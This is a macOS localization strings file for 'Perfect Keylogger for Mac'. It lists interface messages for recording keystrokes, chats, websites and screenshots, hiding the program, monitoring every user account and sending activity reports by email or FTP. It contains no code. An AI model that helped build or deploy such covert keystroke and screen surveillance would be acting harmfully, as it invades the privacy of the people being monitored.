/* 
   Localizable.strings
   BPK
 */
 
"Recorded on program exit on " = "Recorded on program exit on ";
"Connecting to the server..." = "Connecting to the server...";
"Typed by user" = "Typed by user %@ in %@ on %@";
"Error: can't save keystroke log file" = "Error: can't save keystroke log file";
"To enable keystroke logging" = "To enable keystroke logging, you need to check \"Enable access for assistive devices\" option in System Preferences > Universal Access. Restart keylogger after that.";
"Authentication completed! Sending the message..." = "Authentication completed! Sending the message...";
"Authentication failed! Closing the connection..." = "Authentication failed! Closing the connection...";
"Connected!" = "Connected!";
"Now starting SSL..." = "Now starting SSL...";
"Connnection lost, probably because of spam filter" = "Connnection lost, probably because of spam filter";
"Connection timed out." = "Connection timed out.";
"Sent! Closing the connection." = "Sent! Closing the connection.";
"The message wasn't sent." = "The message wasn't sent.";
"Sending the message..." = "Sending the message...";
"Connection closed." = "Connection closed.";
"Congratulations! Your email settings are correct." = "Congratulations! Your email settings are correct.";
"BPK for Mac Test Message" = "Test Message";
"Perfect Keylogger for Mac" = "Perfect Keylogger for Mac";
"Would you like to continue monitoring or stop keylogger?" = "Would you like to continue monitoring or stop keylogger?";
"Hide and continue" = "Hide and continue";
"Stop and exit" = "Stop and exit";
"Cancel" = "Cancel";
"Trial period:" = "Trial period: %d days left";
"Can't use this hotkey, please choose another one!" = "Can't use this hotkey, please choose another one!";
"OK" = "OK";
"Visited by %@ on" = "Visited by %@ on";
"Do you really want to clear all logs?" = "Do you really want to clear all logs?";
"Do you really want to clear keystroke log?" = "Do you really want to clear keystroke log?";
"Do you really want to clear chat log?" = "Do you really want to clear chat log?";
"Do you really want to clear website log?" = "Do you really want to clear website log?";
"Do you really want to delete all screenshots?" = "Do you really want to delete all screenshots?";
"Clear" = "Clear";
"No screenshots found or other error" = "No screenshots found or other error";
"All screenshots have been deleted successfully!" = "All screenshots have been deleted successfully!";
"Website log file doesn't exist!" = "Website log file doesn't exist!";
"The website log has been deleted successfully!" = "The website log has been deleted successfully!";
"Chat log file doesn't exist!" = "Chat log file doesn't exist!";
"The chat log has been deleted successfully!" = "The chat log has been deleted successfully!";
"Keystroke log file doesn't exist!" = "Keystroke log file doesn't exist!";
"The keystroke log has been deleted successfully!" = "The keystroke log has been deleted successfully!";
"All logs have been deleted!" = "All logs have been deleted!";
"Thank you for your order!" = "Thank you for your order!";
"Your trial period is expired." = "Your trial period is expired. Please purchase a license, if you wish to continue using this program";
"Purchase a license" = "Purchase a license";
"Close" = "Close";
"Enter license key" = "Enter license key";
"Congratulations! Your FTP settings are correct." = "Congratulations! Your connection settings are correct.";
"Activity report for user" = "Activity reports for user %@, %@";
"The activity reports are attached." = "The activity reports are attached.";
"Connecting to the server..." = "Connecting to the server...";
"Enter a new alert word or phrase" = "Enter a new alert word or phrase";
"Alert detected:" = "Alert detected: \"%@\" - typed in %@ by user %@";
"Alert detected with screenshot:" = "Alert detected: \"%@\" - typed by user %@";
"Use keys to access keylogger" = "Use %@ keys to access keylogger";
"No screenshots recorded" = "No screenshots recorded";
"Recorded on" = "Recorded on %@";
"No keystrokes recorded" = "No keystrokes recorded";
"No websites recorded" = "No websites recorded";
"No chats recorded" = "No chats recorded";
"Error saving file" = "Error saving file";
"Saved" = "Saved";
"Upload succeeded!" = "Upload succeeded!";
"Upload failed! Please check your settings and try again" = "Upload failed! Please check your settings and try again";
"Incorrect user name or password for MobileMe service" = "Incorrect user name or password for MobileMe service";
"Choose folder" = "Choose folder";
"Choose folder to save the logs" = "Choose folder to save the logs";
"Enter a part of window title you would like to monitor" = "Enter a part of window title you would like to monitor";
"Click to show the closest screenshot" = "Click to show the closest screenshot";
"chat recorded" = "chat recorded";
"Logs.zip" = "Logs.zip";
"Saving.." = "Saving..";
"logKext log" = "logKext log";
"logKext log is empty" = "logKext log is empty";
"Do you really want to delete logKext log?" = "Do you really want to delete logKext log?";
"The logKext log has been deleted successfully!" = "The logKext log has been deleted successfully!";
"logKext log" = "logKext log";
"General" = "General";
"Screenshots" = "Screenshots";
"Alerts" = "Alerts";
"Email" = "Email";
"FTP" = "FTP";
"Storage" = "Storage";
"FTP and iDisk" = "FTP and iDisk";
"Local storage" = "Local storage";
"This folder seems to be not writable, please choose another one" = "This folder seems to be not writable, please choose another one";
"Blocker" = "Blocker";
"Website blocker" = "Website blocker";
"Enter any phrase from web page title" = "Enter any phrase from web page title";
"Enter a website address or its part" = "Enter a website address or its part";
"Users" = "Users";
"Local users" = "Local users";
"The current options have been applied to all users of this Mac" = "The current options have been applied to all users of this Mac";
"Errors occurred while sharing the options" = "Errors occurred while sharing the options";
"Errors occurred while enabling the monitoring for all users" = "Errors occurred while enabling the monitoring for all users";
"Errors occurred while disabling the monitoring for all users" = "Errors occurred while disabling the monitoring for all users";
"Only this user account will be monitored" = "Only this user account will be monitored";
"Enter user name, or user's home folder name" = "Enter user name, or user's home folder name";
"Days recorded:" = "Days recorded:";